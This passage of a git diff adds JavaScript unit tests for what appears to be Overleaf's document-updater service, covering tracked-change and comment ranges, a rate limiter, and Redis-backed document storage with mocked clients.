trackedChanges: [ + { type: 'insert', offset: 0, length: 2 }, + { type: 'insert', offset: 3, length: 2 }, + ], + }, + ], + [ + { + d: 'ou', + p: 6, + hpos: 7, + trackedChanges: [{ type: 'insert', offset: 0, length: 2 }], + }, + ], + ]) + }) + }) + + describe('comments among tracked deletes', function () { + beforeEach(function () { + // original text is "on[1]e[22] [333](three) fo[4444]ur five" + // [] denotes tracked deletes + // () denotes tracked inserts + this.ranges = { + changes: makeRanges([ + { d: '1', p: 2 }, + { d: '22', p: 3 }, + { d: '333', p: 4 }, + { i: 'three', p: 4 }, + { d: '4444', p: 12 }, + ]), + } + this.updates = makeUpdates([ + { c: 'three ', p: 4 }, + { c: 'four ', p: 10 }, + ]) + this.newDocLines = ['one three four five'] + this.result = 
this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should offset the hpos by the length of tracked deletes before the insert', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ c: 'three ', p: 4, hpos: 10 }], + [{ c: 'four ', p: 10, hpos: 16, hlen: 9 }], + ]) + }) + }) + + describe('inserts inside comments', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([ + { c: 'three', p: 4, t: 'comment-id-1' }, + { c: 'ree four', p: 6, t: 'comment-id-2' }, + ]), + } + this.updates = makeUpdates([ + { i: '[before]', p: 4 }, + { i: '[inside]', p: 13 }, // 4 + 8 + 1 + { i: '[overlap]', p: 23 }, // 13 + 8 + 2 + { i: '[after]', p: 39 }, // 23 + 9 + 7 + ]) + this.newDocLines = [ + 'one [before]t[inside]hr[overlap]ee four[after] five', + ] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should add the proper commentIds properties to ops', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ i: '[before]', p: 4 }], + [{ i: '[inside]', p: 13, commentIds: ['comment-id-1'] }], + [ + { + i: '[overlap]', + p: 23, + commentIds: ['comment-id-1', 'comment-id-2'], + }, + ], + [{ i: '[after]', p: 39 }], + ]) + }) + }) + + describe('tracked delete that overlaps the start of a comment', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([{ c: 'three', p: 4, t: 'comment-id-1' }]), + } + this.updates = makeUpdates([{ d: 'ne thr', p: 1 }], { + tc: 'tracking-id', + }) + this.newDocLines = ['oee four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should crop the beginning of the comment', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { d: 'ne thr', p: 1 }, + { c: 'ee', p: 1, hpos: 7, t: 'comment-id-1' }, + ], + ]) + }) + }) + + describe('tracked delete that overlaps a whole comment', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([{ c: 'three', p: 4, t: 'comment-id-1' }]), + } + this.updates = makeUpdates([{ d: 'ne three f', p: 1 }], { + tc: 'tracking-id', + }) + this.newDocLines = ['oour five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should crop the beginning of the comment', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { d: 'ne three f', p: 1 }, + { c: '', p: 1, hpos: 11, t: 'comment-id-1' }, + ], + ]) + }) + }) + + describe('tracked delete that overlaps the end of a comment', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([{ c: 'three', p: 4, t: 'comment-id-1' }]), + } + this.updates = makeUpdates([{ d: 'ee f', p: 7 }], { + tc: 'tracking-id', + }) + this.newDocLines = ['one throur five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { 
historyRangesSupport: true } + ) + }) + + it('should crop the end of the comment', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { d: 'ee f', p: 7 }, + { c: 'thr', p: 4, t: 'comment-id-1' }, + ], + ]) + }) + }) + + describe('tracked delete that overlaps the inside of a comment', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([{ c: 'three', p: 4, t: 'comment-id-1' }]), + } + this.updates = makeUpdates([{ d: 'hre', p: 5 }], { + tc: 'tracking-id', + }) + this.newDocLines = ['one te four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should not crop the comment', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ d: 'hre', p: 5 }], + ]) + }) + }) + }) + }) + + describe('acceptChanges', function () { + beforeEach(function () { + this.RangesManager = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/ranges-tracker': (this.RangesTracker = + SandboxedModule.require('@overleaf/ranges-tracker')), + '@overleaf/metrics': {}, + }, + }) + + this.ranges = { + comments: [], + changes: makeRanges([ + { i: 'lorem', p: 0 }, + { i: 'ipsum', p: 10 }, + { i: 'dolor', p: 20 }, + { i: 'sit', p: 30 }, + { i: 'amet', p: 40 }, + ]), + } + this.lines = ['lorem xxx', 'ipsum yyy', 'dolor zzz', 'sit wwwww', 'amet'] + this.removeChangeIdsSpy = sinon.spy( + this.RangesTracker.prototype, + 'removeChangeIds' + ) + }) + + describe('successfully with a single change', function () { + beforeEach(function () { + this.change_ids = [this.ranges.changes[1].id] + this.result = this.RangesManager.acceptChanges( + this.project_id, + this.doc_id, + this.change_ids, + this.ranges, + this.lines + ) + }) + + it('should log the call with the correct number of changes', function () { + this.logger.debug + .calledWith('accepting 1 changes in ranges') + .should.equal(true) + }) + + it('should delegate the change removal to the ranges tracker', function () { + this.removeChangeIdsSpy.calledWith(this.change_ids).should.equal(true) + }) + + it('should remove the change', function () { + expect( + this.result.changes.find( + change => change.id === this.ranges.changes[1].id + ) + ).to.be.undefined + }) + + it('should return the original number of changes minus 1', function () { + this.result.changes.length.should.equal(this.ranges.changes.length - 1) + }) + + it('should not touch other changes', function () { + for (const i of [0, 2, 3, 4]) { + expect( + this.result.changes.find( + change => change.id === this.ranges.changes[i].id + ) + ).to.deep.equal(this.ranges.changes[i]) + } + }) + }) + + describe('successfully with multiple changes', function () { + beforeEach(function () { + this.change_ids = [ + this.ranges.changes[1].id, + this.ranges.changes[3].id, + this.ranges.changes[4].id, + ] + this.result = this.RangesManager.acceptChanges( + this.project_id, + this.doc_id, + this.change_ids, + this.ranges, + this.lines + ) + }) + + it('should log the call with the correct number of changes', function () { + this.logger.debug + .calledWith(`accepting ${this.change_ids.length} changes in ranges`) + .should.equal(true) + }) + + it('should delegate the change removal to the ranges tracker', function () { + this.removeChangeIdsSpy.calledWith(this.change_ids).should.equal(true) + }) + + it('should remove the changes', function () { + for 
(const i of [1, 3, 4]) { + expect( + this.result.changes.find( + change => change.id === this.ranges.changes[i].id + ) + ).to.be.undefined + } + }) + + it('should return the original number of changes minus the number of accepted changes', function () { + this.result.changes.length.should.equal(this.ranges.changes.length - 3) + }) + + it('should not touch other changes', function () { + for (const i of [0, 2]) { + expect( + this.result.changes.find( + change => change.id === this.ranges.changes[i].id + ) + ).to.deep.equal(this.ranges.changes[i]) + } + }) + }) + }) + + describe('getHistoryUpdatesForAcceptedChanges', function () { + beforeEach(function () { + this.clock = sinon.useFakeTimers() + this.RangesManager = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/ranges-tracker': (this.RangesTracker = + SandboxedModule.require('@overleaf/ranges-tracker')), + '@overleaf/metrics': {}, + }, + }) + }) + + afterEach(function () { + this.clock.restore() + }) + + it('should create history updates for accepted track inserts', function () { + // 'one two three four five' <-- text before changes + const ranges = { + comments: [], + changes: makeRanges([ + { i: 'lorem', p: 0 }, + { i: 'ipsum', p: 15 }, + ]), + } + const lines = ['loremone two thipsumree four five'] + + const now = Date.now() + + const result = this.RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId: this.doc_id, + acceptedChangeIds: ranges.changes.map(change => change.id), + changes: ranges.changes, + pathname: '', + projectHistoryId: '', + lines, + }) + + expect(result).to.deep.equal([ + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 33, + pathname: '', + ts: now, + }, + op: [ + { + r: 'lorem', + p: 0, + tracking: { type: 'none' }, + }, + ], + }, + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 33, + pathname: '', + ts: now, + }, + op: [ + { + r: 'ipsum', + p: 15, + tracking: { type: 'none' }, + }, + ], + }, + ]) + }) + + it('should create history updates for accepted track deletes', function () { + // 'one two three four five' <-- text before changes + const ranges = { + comments: [], + changes: makeRanges([ + { d: 'two', p: 4 }, + { d: 'three', p: 5 }, + ]), + } + const lines = ['one four five'] + + const now = Date.now() + + const result = this.RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId: this.doc_id, + acceptedChangeIds: ranges.changes.map(change => change.id), + changes: ranges.changes, + pathname: '', + projectHistoryId: '', + lines, + }) + + expect(result).to.deep.equal([ + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 23, + pathname: '', + ts: now, + }, + op: [ + { + d: 'two', + p: 4, + }, + ], + }, + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 20, + pathname: '', + ts: now, + }, + op: [ + { + d: 'three', + p: 5, + }, + ], + }, + ]) + }) + + it('should create history updates with unaccepted deletes', function () { + // 'one two three four five' <-- text before changes + const ranges = { + comments: [], + changes: makeRanges([ + { d: 'two', p: 4 }, + { d: 'three', p: 5 }, + ]), + } + const lines = ['one four five'] + + const now = Date.now() + + const result = this.RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId: this.doc_id, + acceptedChangeIds: [ranges.changes[1].id], + changes: ranges.changes, + pathname: '', + projectHistoryId: '', + lines, + }) + + expect(result).to.deep.equal([ + { + doc: this.doc_id, + meta: { + 
user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 23, + pathname: '', + ts: now, + }, + op: [ + { + d: 'three', + p: 5, + hpos: 8, + }, + ], + }, + ]) + }) + + it('should create history updates with mixed track changes', function () { + // 'one two three four five' <-- text before changes + const ranges = { + comments: [], + changes: makeRanges([ + { d: 'two', p: 4 }, + { d: 'three', p: 5 }, + { i: 'xxx ', p: 6 }, + { d: 'five', p: 15 }, + ]), + } + const lines = ['one xxx four '] + + const now = Date.now() + + const result = this.RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId: this.doc_id, + acceptedChangeIds: [ + ranges.changes[0].id, + // ranges.changes[1].id - second delete is not accepted + ranges.changes[2].id, + ranges.changes[3].id, + ], + changes: ranges.changes, + pathname: '', + projectHistoryId: '', + lines, + }) + + expect(result).to.deep.equal([ + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 27, + pathname: '', + ts: now, + }, + op: [ + { + d: 'two', + p: 4, + }, + ], + }, + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 24, + pathname: '', + ts: now, + }, + op: [ + { + r: 'xxx ', + p: 6, + hpos: 11, + tracking: { type: 'none' }, + }, + ], + }, + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 24, + pathname: '', + ts: now, + }, + op: [ + { + d: 'five', + p: 15, + hpos: 20, + }, + ], + }, + ]) + }) + }) +}) + +function makeRanges(ops) { + let id = 1 + const changes = [] + let ts = Date.now() + for (const op of ops) { + changes.push({ + id: id.toString(), + op, + metadata: { user_id: TEST_USER_ID, ts: new Date(ts).toISOString() }, + }) + id += 1 + ts += 1000 // use a unique timestamp for each change + } + return changes +} + +function makeUpdates(ops, meta = {}) { + const updates = [] + for (const op of ops) { + updates.push({ + meta: { user_id: TEST_USER_ID, ...meta }, + op: [op], + }) + } + return updates +} diff --git a/services/document-updater/test/unit/js/RateLimitManager/RateLimitManager.js b/services/document-updater/test/unit/js/RateLimitManager/RateLimitManager.js new file mode 100644 index 0000000..09c4eba --- /dev/null +++ b/services/document-updater/test/unit/js/RateLimitManager/RateLimitManager.js @@ -0,0 +1,133 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
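Before the rate-limiter cases below, it may help to state the contract they pin down. The following is a minimal sketch reconstructed from the assertions alone, not the actual RateLimitManager (which also records metrics via a Timer/gauge and adapts its worker limit): a task arriving under the worker limit runs in the background and the caller's callback fires immediately, while a task arriving at the limit keeps the caller waiting until it completes; ActiveWorkerCount counts tasks that have started but not yet signalled completion.

class SketchRateLimiter {
  constructor(limit) {
    this.CurrentWorkerLimit = limit
    this.ActiveWorkerCount = 0
  }

  _trackAndRun(task, callback = () => {}) {
    this.ActiveWorkerCount++
    task(err => {
      this.ActiveWorkerCount--
      callback(err)
    })
  }

  run(task, callback) {
    if (this.ActiveWorkerCount < this.CurrentWorkerLimit) {
      // below the limit: fire and forget; the caller is not blocked
      this._trackAndRun(task)
      callback()
    } else {
      // at the limit: the caller's callback waits for task completion
      this._trackAndRun(task, callback)
    }
  }
}

// Against the tests below: a stubbed task never calls its completion
// callback, so it stays counted forever ("worker count of one" / "three"),
// while tasks that complete after 100ms have all drained by the time the
// final task's callback fires ("worker count of zero").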
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/RateLimitManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('RateLimitManager', function () { + beforeEach(function () { + let Timer + this.RateLimitManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = {}), + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + gauge: sinon.stub(), + }), + }, + }) + this.callback = sinon.stub() + return (this.RateLimiter = new this.RateLimitManager(1)) + }) + + describe('for a single task', function () { + beforeEach(function () { + this.task = sinon.stub() + return this.RateLimiter.run(this.task, this.callback) + }) + + it('should execute the task in the background', function () { + return this.task.called.should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should finish with a worker count of one', function () { + // because it's in the background + return expect(this.RateLimiter.ActiveWorkerCount).to.equal(1) + }) + }) + + describe('for multiple tasks', function () { + beforeEach(function (done) { + this.task = sinon.stub() + this.finalTask = sinon.stub() + const task = cb => { + this.task() + return setTimeout(cb, 100) + } + const finalTask = cb => { + this.finalTask() + return setTimeout(cb, 100) + } + this.RateLimiter.run(task, this.callback) + this.RateLimiter.run(task, this.callback) + this.RateLimiter.run(task, this.callback) + return this.RateLimiter.run(finalTask, err => { + this.callback(err) + return done() + }) + }) + + it('should execute the first three tasks', function () { + return this.task.calledThrice.should.equal(true) + }) + + it('should execute the final task', function () { + return this.finalTask.called.should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should finish with worker count of zero', function () { + return expect(this.RateLimiter.ActiveWorkerCount).to.equal(0) + }) + }) + + return describe('for a mixture of long-running tasks', function () { + beforeEach(function (done) { + this.task = sinon.stub() + this.finalTask = sinon.stub() + const finalTask = cb => { + this.finalTask() + return setTimeout(cb, 100) + } + this.RateLimiter.run(this.task, this.callback) + this.RateLimiter.run(this.task, this.callback) + this.RateLimiter.run(this.task, this.callback) + return this.RateLimiter.run(finalTask, err => { + this.callback(err) + return done() + }) + }) + + it('should execute the first three tasks', function () { + return this.task.calledThrice.should.equal(true) + }) + + it('should execute the final task', function () { + return this.finalTask.called.should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should finish with worker count of three', function () { + return expect(this.RateLimiter.ActiveWorkerCount).to.equal(3) + }) + }) +}) diff --git 
a/services/document-updater/test/unit/js/RealTimeRedisManager/RealTimeRedisManagerTests.js b/services/document-updater/test/unit/js/RealTimeRedisManager/RealTimeRedisManagerTests.js new file mode 100644 index 0000000..d678c8d --- /dev/null +++ b/services/document-updater/test/unit/js/RealTimeRedisManager/RealTimeRedisManagerTests.js @@ -0,0 +1,167 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/RealTimeRedisManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') + +describe('RealTimeRedisManager', function () { + beforeEach(function () { + this.rclient = { + auth() {}, + exec: sinon.stub(), + } + this.rclient.multi = () => this.rclient + this.pubsubClient = { publish: sinon.stub() } + this.RealTimeRedisManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/redis-wrapper': { + createClient: config => + config.name === 'pubsub' ? this.pubsubClient : this.rclient, + }, + '@overleaf/settings': { + redis: { + documentupdater: (this.settings = { + key_schema: { + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:${docId}` + }, + }, + }), + pubsub: { + name: 'pubsub', + }, + }, + }, + crypto: (this.crypto = { + randomBytes: sinon + .stub() + .withArgs(4) + .returns(Buffer.from([0x1, 0x2, 0x3, 0x4])), + }), + os: (this.os = { hostname: sinon.stub().returns('somehost') }), + './Metrics': (this.metrics = { + summary: sinon.stub(), + histogram: sinon.stub(), + }), + }, + }) + + this.doc_id = 'doc-id-123' + this.project_id = 'project-id-123' + return (this.callback = sinon.stub()) + }) + + describe('getPendingUpdatesForDoc', function () { + beforeEach(function () { + this.rclient.llen = sinon.stub() + this.rclient.lrange = sinon.stub() + return (this.rclient.ltrim = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function () { + this.updates = [ + { op: [{ i: 'foo', p: 4 }] }, + { op: [{ i: 'foo', p: 4 }] }, + ] + this.jsonUpdates = this.updates.map(update => JSON.stringify(update)) + this.rclient.exec = sinon.stub().yields(null, [2, this.jsonUpdates]) + return this.RealTimeRedisManager.getPendingUpdatesForDoc( + this.doc_id, + this.callback + ) + }) + + it('should get the pending updates', function () { + return this.rclient.lrange + .calledWith(`PendingUpdates:${this.doc_id}`, 0, 7) + .should.equal(true) + }) + + it('should delete the pending updates', function () { + return this.rclient.ltrim + .calledWith(`PendingUpdates:${this.doc_id}`, 8, -1) + .should.equal(true) + }) + + return it('should call the callback with the updates', function () { + return this.callback.calledWith(null, this.updates).should.equal(true) + }) + }) + + return describe("when the JSON doesn't parse", function () { + beforeEach(function () { + this.jsonUpdates = [ + JSON.stringify({ op: [{ i: 'foo', p: 4 }] }), + 'broken json', + ] + this.rclient.exec = sinon.stub().yields(null, [2, this.jsonUpdates]) + return this.RealTimeRedisManager.getPendingUpdatesForDoc( + this.doc_id, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback + 
.calledWith(sinon.match.has('name', 'SyntaxError')) + .should.equal(true) + }) + }) + }) + + describe('getUpdatesLength', function () { + beforeEach(function () { + this.rclient.llen = sinon.stub().yields(null, (this.length = 3)) + return this.RealTimeRedisManager.getUpdatesLength( + this.doc_id, + this.callback + ) + }) + + it('should look up the length', function () { + return this.rclient.llen + .calledWith(`PendingUpdates:${this.doc_id}`) + .should.equal(true) + }) + + return it('should return the length', function () { + return this.callback.calledWith(null, this.length).should.equal(true) + }) + }) + + return describe('sendData', function () { + beforeEach(function () { + this.message_id = 'doc:somehost:01020304-0' + return this.RealTimeRedisManager.sendData({ op: 'thisop' }) + }) + + it('should send the op with a message id', function () { + return this.pubsubClient.publish + .calledWith( + 'applied-ops', + JSON.stringify({ op: 'thisop', _id: this.message_id }) + ) + .should.equal(true) + }) + + return it('should track the payload size', function () { + return this.metrics.summary + .calledWith( + 'redis.publish.applied-ops', + JSON.stringify({ op: 'thisop', _id: this.message_id }).length + ) + .should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/RedisManager/RedisManagerTests.js b/services/document-updater/test/unit/js/RedisManager/RedisManagerTests.js new file mode 100644 index 0000000..125dd3d --- /dev/null +++ b/services/document-updater/test/unit/js/RedisManager/RedisManagerTests.js @@ -0,0 +1,1153 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') +const crypto = require('node:crypto') +const tk = require('timekeeper') + +const MODULE_PATH = '../../../../app/js/RedisManager.js' + +describe('RedisManager', function () { + beforeEach(function () { + this.multi = { exec: sinon.stub().yields() } + this.rclient = { multi: () => this.multi, srem: sinon.stub().yields() } + tk.freeze(new Date()) + this.RedisManager = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/settings': (this.settings = { + documentupdater: { logHashErrors: { write: true, read: true } }, + redis: { + documentupdater: { + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:${docId}` + }, + docLines({ doc_id: docId }) { + return `doclines:${docId}` + }, + docOps({ doc_id: docId }) { + return `DocOps:${docId}` + }, + docVersion({ doc_id: docId }) { + return `DocVersion:${docId}` + }, + docHash({ doc_id: docId }) { + return `DocHash:${docId}` + }, + projectKey({ doc_id: docId }) { + return `ProjectId:${docId}` + }, + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:${docId}` + }, + docsInProject({ project_id: projectId }) { + return `DocsIn:${projectId}` + }, + ranges({ doc_id: docId }) { + return `Ranges:${docId}` + }, + pathname({ doc_id: docId }) { + return `Pathname:${docId}` + }, + projectHistoryId({ doc_id: docId }) { + return `ProjectHistoryId:${docId}` + }, + projectState({ project_id: projectId }) { + return `ProjectState:${projectId}` + }, + projectBlock({ project_id: projectId }) { + return `ProjectBlock:${projectId}` + }, + unflushedTime({ doc_id: docId }) { + return `UnflushedTime:${docId}` + }, + lastUpdatedBy({ doc_id: docId }) { + return `lastUpdatedBy:${docId}` + }, + lastUpdatedAt({ doc_id: docId }) { + return `lastUpdatedAt:${docId}` + }, + historyRangesSupport() { + return 'HistoryRangesSupport' 
+ }, + resolvedCommentIds({ doc_id: docId }) { + return `ResolvedCommentIds:${docId}` + }, + }, + }, + }, + }), + '@overleaf/redis-wrapper': { + createClient: () => this.rclient, + }, + './Metrics': (this.metrics = { + inc: sinon.stub(), + summary: sinon.stub(), + Timer: class Timer { + constructor() { + this.start = new Date() + } + + done() { + const timeSpan = new Date() - this.start + return timeSpan + } + }, + }), + './Errors': Errors, + }, + }) + + this.docId = 'doc-id-123' + this.project_id = 'project-id-123' + this.projectHistoryId = '123' + this.historyRangesSupport = false + this.callback = sinon.stub() + }) + + afterEach(function () { + tk.reset() + }) + + describe('getDoc', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three', 'これは'] // include some utf8 + this.jsonlines = JSON.stringify(this.lines) + this.version = 42 + this.hash = crypto + .createHash('sha1') + .update(this.jsonlines, 'utf8') + .digest('hex') + this.ranges = { comments: 'mock', entries: 'mock' } + this.resolvedCommentIds = ['comment-1'] + this.json_ranges = JSON.stringify(this.ranges) + this.unflushed_time = 12345 + this.pathname = '/a/b/c.tex' + this.rclient.mget = sinon + .stub() + .yields(null, [ + this.jsonlines, + this.version, + this.hash, + this.project_id, + this.json_ranges, + this.pathname, + this.projectHistoryId.toString(), + this.unflushed_time, + ]) + this.rclient.sismember = sinon.stub() + this.rclient.sismember + .withArgs('HistoryRangesSupport', this.docId) + .yields(null, 0) + this.rclient.smembers = sinon.stub() + this.rclient.smembers + .withArgs(`ResolvedCommentIds:${this.docId}`) + .yields(null, this.resolvedCommentIds) + }) + + describe('successfully', function () { + beforeEach(function () { + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + it('should get all the details in one call to redis', function () { + this.rclient.mget + .calledWith( + `doclines:${this.docId}`, + `DocVersion:${this.docId}`, + `DocHash:${this.docId}`, + `ProjectId:${this.docId}`, + `Ranges:${this.docId}`, + `Pathname:${this.docId}`, + `ProjectHistoryId:${this.docId}`, + `UnflushedTime:${this.docId}`, + `lastUpdatedAt:${this.docId}`, + `lastUpdatedBy:${this.docId}` + ) + .should.equal(true) + }) + + it('should return the document', function () { + this.callback.should.have.been.calledWithExactly( + null, + this.lines, + this.version, + this.ranges, + this.pathname, + this.projectHistoryId, + this.unflushed_time, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.historyRangesSupport, + this.resolvedCommentIds + ) + }) + + it('should not log any errors', function () { + this.logger.error.calledWith().should.equal(false) + }) + }) + + describe('with a corrupted document', function () { + beforeEach(function () { + this.badHash = 'INVALID-HASH-VALUE' + this.rclient.mget = sinon + .stub() + .yields(null, [ + this.jsonlines, + this.version, + this.badHash, + this.project_id, + this.json_ranges, + ]) + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + it('should log a hash error', function () { + this.logger.error.calledWith().should.equal(true) + }) + + it('should return the document', function () { + this.callback + .calledWith(null, this.lines, this.version, this.ranges) + .should.equal(true) + }) + }) + + describe('with a slow request to redis', function () { + beforeEach(function () { + this.clock = sinon.useFakeTimers() + this.rclient.mget = (...args) => { + const cb = args.pop() + this.clock.tick(6000) + cb(null, [ + 
this.jsonlines, + this.version, + this.another_project_id, + this.json_ranges, + this.pathname, + this.unflushed_time, + ]) + } + + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + afterEach(function () { + this.clock.restore() + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('getDoc with an invalid project id', function () { + beforeEach(function () { + this.another_project_id = 'project-id-456' + this.rclient.mget = sinon + .stub() + .yields(null, [ + this.jsonlines, + this.version, + this.hash, + this.another_project_id, + this.json_ranges, + this.pathname, + this.unflushed_time, + ]) + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + }) + + describe('with history ranges support', function () { + beforeEach(function () { + this.rclient.sismember + .withArgs('HistoryRangesSupport', this.docId) + .yields(null, 1) + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + it('should return the document with the history ranges flag set', function () { + this.callback.should.have.been.calledWithExactly( + null, + this.lines, + this.version, + this.ranges, + this.pathname, + this.projectHistoryId, + this.unflushed_time, + this.lastUpdatedAt, + this.lastUpdatedBy, + true, + this.resolvedCommentIds + ) + }) + }) + }) + + describe('getPreviousDocOpsTests', function () { + describe('with a start and an end value', function () { + beforeEach(function () { + this.first_version_in_redis = 30 + this.version = 70 + this.length = this.version - this.first_version_in_redis + this.start = 50 + this.end = 60 + this.ops = [{ mock: 'op-1' }, { mock: 'op-2' }] + this.jsonOps = this.ops.map(op => JSON.stringify(op)) + this.rclient.llen = sinon.stub().callsArgWith(1, null, this.length) + this.rclient.get = sinon + .stub() + .callsArgWith(1, null, this.version.toString()) + this.rclient.lrange = sinon.stub().callsArgWith(3, null, this.jsonOps) + this.RedisManager.getPreviousDocOps( + this.docId, + this.start, + this.end, + this.callback + ) + }) + + it('should get the length of the existing doc ops', function () { + this.rclient.llen.calledWith(`DocOps:${this.docId}`).should.equal(true) + }) + + it('should get the current version of the doc', function () { + this.rclient.get + .calledWith(`DocVersion:${this.docId}`) + .should.equal(true) + }) + + it('should get the appropriate docs ops', function () { + this.rclient.lrange + .calledWith( + `DocOps:${this.docId}`, + this.start - this.first_version_in_redis, + this.end - this.first_version_in_redis + ) + .should.equal(true) + }) + + it('should return the docs with the doc ops deserialized', function () { + this.callback.calledWith(null, this.ops).should.equal(true) + }) + }) + + describe('with an end value of -1', function () { + beforeEach(function () { + this.first_version_in_redis = 30 + this.version = 70 + this.length = this.version - this.first_version_in_redis + this.start = 50 + this.end = -1 + this.ops = [{ mock: 'op-1' }, { mock: 'op-2' }] + this.jsonOps = this.ops.map(op => JSON.stringify(op)) + this.rclient.llen = sinon.stub().callsArgWith(1, null, this.length) + this.rclient.get = sinon + .stub() + .callsArgWith(1, null, this.version.toString()) + this.rclient.lrange = sinon.stub().callsArgWith(3, null, this.jsonOps) + 
this.RedisManager.getPreviousDocOps( + this.docId, + this.start, + this.end, + this.callback + ) + }) + + it('should get the appropriate docs ops to the end of list', function () { + this.rclient.lrange + .calledWith( + `DocOps:${this.docId}`, + this.start - this.first_version_in_redis, + -1 + ) + .should.equal(true) + }) + + it('should return the docs with the doc ops deserialized', function () { + this.callback.calledWith(null, this.ops).should.equal(true) + }) + }) + + describe('when the requested range is not in Redis', function () { + beforeEach(function () { + this.first_version_in_redis = 30 + this.version = 70 + this.length = this.version - this.first_version_in_redis + this.start = 20 + this.end = -1 + this.ops = [{ mock: 'op-1' }, { mock: 'op-2' }] + this.jsonOps = this.ops.map(op => JSON.stringify(op)) + this.rclient.llen = sinon.stub().callsArgWith(1, null, this.length) + this.rclient.get = sinon + .stub() + .callsArgWith(1, null, this.version.toString()) + this.rclient.lrange = sinon.stub().callsArgWith(3, null, this.jsonOps) + this.RedisManager.getPreviousDocOps( + this.docId, + this.start, + this.end, + this.callback + ) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.OpRangeNotAvailableError)) + .should.equal(true) + }) + + it('should send details for metrics', function () { + 